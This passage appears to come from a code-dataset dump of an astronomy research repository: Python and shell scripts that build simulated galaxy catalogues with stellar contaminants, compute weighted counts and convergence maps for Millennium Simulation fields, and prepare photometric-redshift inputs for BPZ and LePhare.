(rmag__ugrizJHK <= 24)))]\n\n # inserting the stellar contaminants\n if limmag == 22.5:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225))\n if limmag == 23:\n posx_ugrizJHK = 
np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23))\n if limmag == 23.5:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235))\n if limmag == 24:\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235,cont_posx_24))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235,cont_posy_24))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235,cont_rmag_24))\n #if len(rmag_ugrizJHK) > 0: print np.max(rmag_ugrizJHK)\n\n # repeat for ugriz catalogues\n\n count18 = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= 18)].size\n count185 = posx__ugriz[(rmag__ugriz > 18) & (rmag__ugriz <= 18.5)].size\n count19 = posx__ugriz[(rmag__ugriz > 18.5) & (rmag__ugriz <= 19)].size\n count195 = posx__ugriz[(rmag__ugriz > 19) & (rmag__ugriz <= 19.5)].size\n count20 = posx__ugriz[(rmag__ugriz > 19.5) & (rmag__ugriz <= 20)].size\n count205 = posx__ugriz[(rmag__ugriz > 20) & (rmag__ugriz <= 20.5)].size\n count21 = posx__ugriz[(rmag__ugriz > 20.5) & (rmag__ugriz <= 21)].size\n count215 = posx__ugriz[(rmag__ugriz > 21) & (rmag__ugriz <= 21.5)].size\n count22 = posx__ugriz[(rmag__ugriz > 21.5) & (rmag__ugriz <= 22)].size\n count225 = posx__ugriz[(rmag__ugriz > 22) & (rmag__ugriz <= 22.5)].size\n count23 = posx__ugriz[(rmag__ugriz > 22.5) & (rmag__ugriz <= 23)].size\n count235 = posx__ugriz[(rmag__ugriz > 23) & (rmag__ugriz <= 23.5)].size\n count24 = posx__ugriz[(rmag__ugriz > 23.5) & (rmag__ugriz <= 24)].size\n\n # generate the stellar contaminants\n cont_18,cont_posx_18,cont_posy_18,cont_rmag_18 = contaminants(count18,cont_ugriz_18,posxmin,posxmax,posymin,posymax,star_rmag_18)\n cont_185,cont_posx_185,cont_posy_185,cont_rmag_185 = contaminants(count185,cont_ugriz_185,posxmin,posxmax,posymin,posymax,star_rmag_185)\n cont_19,cont_posx_19,cont_posy_19,cont_rmag_19 = 
contaminants(count19,cont_ugriz_19,posxmin,posxmax,posymin,posymax,star_rmag_19)\n cont_195,cont_posx_195,cont_posy_195,cont_rmag_195 = contaminants(count195,cont_ugriz_195,posxmin,posxmax,posymin,posymax,star_rmag_195)\n cont_20,cont_posx_20,cont_posy_20,cont_rmag_20 = contaminants(count20,cont_ugriz_20,posxmin,posxmax,posymin,posymax,star_rmag_20)\n cont_205,cont_posx_205,cont_posy_205,cont_rmag_205 = contaminants(count205,cont_ugriz_205,posxmin,posxmax,posymin,posymax,star_rmag_205)\n cont_21,cont_posx_21,cont_posy_21,cont_rmag_21 = contaminants(count21,cont_ugriz_21,posxmin,posxmax,posymin,posymax,star_rmag_21)\n cont_215,cont_posx_215,cont_posy_215,cont_rmag_215 = contaminants(count215,cont_ugriz_215,posxmin,posxmax,posymin,posymax,star_rmag_215)\n cont_22,cont_posx_22,cont_posy_22,cont_rmag_22 = contaminants(count22,cont_ugriz_22,posxmin,posxmax,posymin,posymax,star_rmag_22)\n cont_225,cont_posx_225,cont_posy_225,cont_rmag_225 = contaminants(count225,cont_ugriz_225,posxmin,posxmax,posymin,posymax,star_rmag_225)\n cont_23,cont_posx_23,cont_posy_23,cont_rmag_23 = contaminants(count23,cont_ugriz_23,posxmin,posxmax,posymin,posymax,star_rmag_23)\n cont_235,cont_posx_235,cont_posy_235,cont_rmag_235 = contaminants(count235,cont_ugriz_235,posxmin,posxmax,posymin,posymax,star_rmag_235)\n cont_24,cont_posx_24,cont_posy_24,cont_rmag_24 = contaminants(count24,cont_ugriz_24,posxmin,posxmax,posymin,posymax,star_rmag_24)\n\n posx__ugriz = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n posy__ugriz = posy__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n rmag__ugriz = rmag__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag) & (((rmag__ugriz > brightmag) & (rmag__ugriz <= 18)) | ((rmag__ugriz > 18) & (rmag__ugriz <= 18.5)) | ((rmag__ugriz > 18.5) & (rmag__ugriz <= 19)) | ((rmag__ugriz > 19) & (rmag__ugriz <= 19.5)) | ((rmag__ugriz > 19.5) & (rmag__ugriz <= 20)) | ((rmag__ugriz > 20) & (rmag__ugriz <= 20.5)) | ((rmag__ugriz > 20.5) & (rmag__ugriz <= 21)) | ((rmag__ugriz > 21) & (rmag__ugriz <= 21.5)) | ((rmag__ugriz > 21.5) & (rmag__ugriz <= 22)) | ((rmag__ugriz > 22) & (rmag__ugriz <= 22.5)) | ((rmag__ugriz > 22.5) & (rmag__ugriz <= 23)) | ((rmag__ugriz > 23) & (rmag__ugriz <= 23.5)) | ((rmag__ugriz > 23.5) & (rmag__ugriz <= 24)))]\n\n if limmag == 
22.5:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225))\n if limmag == 23:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23))\n if limmag == 23.5:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235))\n if limmag == 24:\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz,cont_posx_18,cont_posx_185,cont_posx_19,cont_posx_195,cont_posx_20,cont_posx_205,cont_posx_21,cont_posx_215,cont_posx_22,cont_posx_225,cont_posx_23,cont_posx_235,cont_posx_24))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz,cont_posy_18,cont_posy_185,cont_posy_19,cont_posy_195,cont_posy_20,cont_posy_205,cont_posy_21,cont_posy_215,cont_posy_22,cont_posy_225,cont_posy_23,cont_posy_235,cont_posy_24))\n rmag_ugriz = np.concatenate((rmag_ugriz,rmag__ugriz,cont_rmag_18,cont_rmag_185,cont_rmag_19,cont_rmag_195,cont_rmag_20,cont_rmag_205,cont_rmag_21,cont_rmag_215,cont_rmag_22,cont_rmag_225,cont_rmag_23,cont_rmag_235,cont_rmag_24))\n #if len(rmag_ugriz) > 0: print np.max(rmag_ugriz)\n\n else:\n posx__ugrizJHK = posx__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n posy__ugrizJHK = posy__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n rmag__ugrizJHK = rmag__ugrizJHK[(rmag__ugrizJHK > brightmag) & (rmag__ugrizJHK <= limmag)]\n posx_ugrizJHK = np.concatenate((posx_ugrizJHK,posx__ugrizJHK))\n posy_ugrizJHK = np.concatenate((posy_ugrizJHK,posy__ugrizJHK))\n rmag_ugrizJHK = np.concatenate((rmag_ugrizJHK,rmag__ugrizJHK))\n\n posx__ugriz = posx__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n posy__ugriz = posy__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n rmag__ugriz = rmag__ugriz[(rmag__ugriz > brightmag) & (rmag__ugriz <= limmag)]\n posx_ugriz = np.concatenate((posx_ugriz,posx__ugriz))\n posy_ugriz = np.concatenate((posy_ugriz,posy__ugriz))\n rmag_ugriz = 
np.concatenate((rmag_ugriz,rmag__ugriz))\n\ncat_ugrizJHK = np.c_[posx_ugrizJHK,posy_ugrizJHK,rmag_ugrizJHK]\ndel posx_ugrizJHK\ndel posy_ugrizJHK\ndel rmag_ugrizJHK\ndel posx__ugrizJHK\ndel posy__ugrizJHK\ndel rmag__ugrizJHK\ncat_ugriz = np.c_[posx_ugriz,posy_ugriz,rmag_ugriz]\ndel posx_ugriz\ndel posy_ugriz\ndel rmag_ugriz\ndel posx__ugriz\ndel posy__ugriz\ndel rmag__ugriz\n\nindex_posx = 0\nindex_posy = 1\nindex_rmag = 2\nindex_sep = -1\nindex_index = -2\n\nprint \"Read galaxy catalogues in \", time.time() - start_readcat, \"seconds\"\n\n############################\n# compute and write weighted counts\n############################\n\ndegree = np.pi / 180\nL_field = 4.0 * degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\npixscl_asec = 4.0 * 3600 / 4096 # kappa pixel size in arcsec\npixscl_rad = pixscl_asec * degree / 3600 # kappa pixel size in radian\n\n# divide the field into cells and compute weighted counts\nstart_weights = time.time()\n\nlim1D = int(radius / pixscl_asec) + 1 # number of kappa pixels that should be ignored at the edge of the field so that the field can be covered by full cells\nspacing = int(2.0 * radius / pixscl_asec + 1) # number of pixels between each pixel considered as a cell center; in order for the cells not to overlap, the grid spacing should be at least this large\ncells_on_a_side = int(1.0 * (4096 - 2 * lim1D) / spacing)\ncells = np.linspace(0,cells_on_a_side**2 - 1,cells_on_a_side**2)\nstart_radius = time.time()\n\ncat = cat_ugrizJHK\nbands = \"ugrizJHK\"\nweightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands)\n\ncat = cat_ugriz\nbands = \"ugriz\"\nweightedcounts(cat,spacing,lim1D,cells_on_a_side,L_field,L_pix,cells,kappagamma,pln,bands)\n\nprint \"Computed weights in \", time.time() - start_weights, \"seconds\"\n\nprint(\" Field done in --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6555031538009644, "alphanum_fraction": 0.7803609371185303, "avg_line_length": 85.63380432128906, "blob_id": "7b83643326094704c33b661d2a9706a82af68fc6", "content_id": "7b74b66470dfa8d76c7c67e70b5e1795226bff5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6151, "license_type": "no_license", "max_line_length": 95, "num_lines": 71, "path": "/python/scripts/NAOJ/screen.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_2_N_4096_ang_4_rays_to_plane_34_f\npython 
/lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_1_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_4_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_5_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py 
GGL_los_8_5_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_6_7_N_4096_ang_4_rays_to_plane_34_f\n\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_0_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_1_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_2_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_3_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_4_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_5_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_6_N_4096_ang_4_rays_to_plane_34_f\npython /lfs08/rusucs/code/kappagammaforChihFan.py GGL_los_8_7_7_N_4096_ang_4_rays_to_plane_34_f\n" }, { "alpha_fraction": 0.5101032257080078, "alphanum_fraction": 0.5840965509414673, "avg_line_length": 45.78911590576172, "blob_id": "20e161f587b6f86c55b539a44bebc9a7dd8e9ea9", "content_id": "18ddb4901fe3ca13bec67b3705f5f93a0b7cad0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "no_license", "max_line_length": 246, "num_lines": 147, "path": "/python/catalogue_utilities/photozMillenium_WFI2033.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code calculates realistic BPZ photoz for galaxies in the Millennium Simulation, based either on ugriz or ugrizJHK fluxes. It then creates the necessary files to run LePhare on SLAC. The code expects input files created by extractMillenium.py\n# run as: python photozMillenium_WFI2033.py /Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images.txt\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\nimport time\n\nstart_timefield = time.time()\n\nroot_bpz = \"/Users/perseus/bpz-1.99.3/test/\"\nroot_original = \"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/txt/\"\nfile = str(sys.argv[1])\nos.system(\"cp %s %s\" % (file,file.replace(root_original, root_bpz)))\nif \"ugrizJHK\" in file:\n    os.system(\"cp %smillennium_ugrizJHK.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\nelse:\n    os.system(\"cp %smillennium_ugriz.columns %s\" % (root_bpz,file.replace(root_original, root_bpz)[:-4]+'.columns'))\n\nos.system(\"python $BPZPATH/bpz.py %s -INTERP 2\" % file.replace(root_original, root_bpz))\nos.system(\"python $BPZPATH/bpzfinalize.py %s\" % file.replace(root_original, root_bpz)[:-4])\n\nid = 0\nu = 1\nu_err = 2\ng = 3\ng_err = 4\nr = 5\nr_err = 6\ni = 7\ni_err = 8\nz = 9\nz_err = 10\nJ = 11\nJ_err = 12\nH = 13\nH_err = 14\nK = 15\nK_err = 16\n\nif \"ugrizJHK\" in file:\n    data = np.loadtxt(file,usecols=[0,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],unpack=True)\n    data_bpz = np.loadtxt(file.replace(root_original, root_bpz)[:-4]+\"_bpz.cat\",usecols=[9,1],unpack=True)\n    ''' Write the mags into LePhare-expected format, and assuming no observations for mags below detection threshold '''\n    u_corr = 0.015\n    g_corr = 0.026\n    r_corr = 0.029\n    i_corr = 0.016\n    z_corr = 0.018\n    J_corr = -0.003\n    H_corr = -0.005\n    K_corr = -0.005\n    #u_corr = 0.036\n    #g_corr = 0.012\n    #r_corr = 0.013\n    #i_corr = -0.000\n    #z_corr = -0.009\n    # If not observed in a specific band, negative values (-99,-99) can be used for (mag,error)\n    data[u_err][np.abs(data[u]) == 99.0] = -99.0\n    data[g_err][np.abs(data[g]) == 99.0] = -99.0\n    data[r_err][np.abs(data[r]) == 99.0] = -99.0\n    data[i_err][np.abs(data[i]) == 99.0] = -99.0\n    data[z_err][np.abs(data[z]) == 99.0] = -99.0\n    data[J_err][np.abs(data[J]) == 99.0] = -99.0\n    data[H_err][np.abs(data[H]) == 99.0] = -99.0\n    data[K_err][np.abs(data[K]) == 99.0] = -99.0\n    data[u][np.abs(data[u]) == 99.0] = -99.0\n    data[g][np.abs(data[g]) == 99.0] = -99.0\n    data[r][np.abs(data[r]) == 99.0] = -99.0\n    data[i][np.abs(data[i]) == 99.0] = -99.0\n    data[z][np.abs(data[z]) == 99.0] = -99.0\n    data[J][np.abs(data[J]) == 99.0] = -99.0\n    data[H][np.abs(data[H]) == 99.0] = -99.0\n    data[K][np.abs(data[K]) == 99.0] = -99.0\n    # apply the corrections suggested by BPZ\n    data[u][np.abs(data[u]) != 99.0] += u_corr\n    data[g][np.abs(data[g]) != 99.0] += g_corr\n    data[r][np.abs(data[r]) != 99.0] += r_corr\n    data[i][np.abs(data[i]) != 99.0] += i_corr\n    data[z][np.abs(data[z]) != 99.0] += z_corr\n    data[J][np.abs(data[J]) != 99.0] += J_corr\n    data[H][np.abs(data[H]) != 99.0] += H_corr\n    data[K][np.abs(data[K]) != 99.0] += K_corr\n    # LePhare thinks error bars = 0 means non-detection, so fix this\n    data[u_err][data[u_err] == 0.00] = 0.01\n    data[g_err][data[g_err] == 0.00] = 0.01\n    data[r_err][data[r_err] == 0.00] = 0.01\n    data[i_err][data[i_err] == 0.00] = 0.01\n    data[z_err][data[z_err] == 0.00] = 0.01\n    data[J_err][data[J_err] == 0.00] = 0.01\n    data[H_err][data[H_err] == 0.00] = 0.01\n    data[K_err][data[K_err] == 0.00] = 0.01\n    fileout = file[:-4] + \"_forlephare.txt\"\n    str = \"ID \\t u \\t u_err \\t g \\t g_err \\t r \\t 
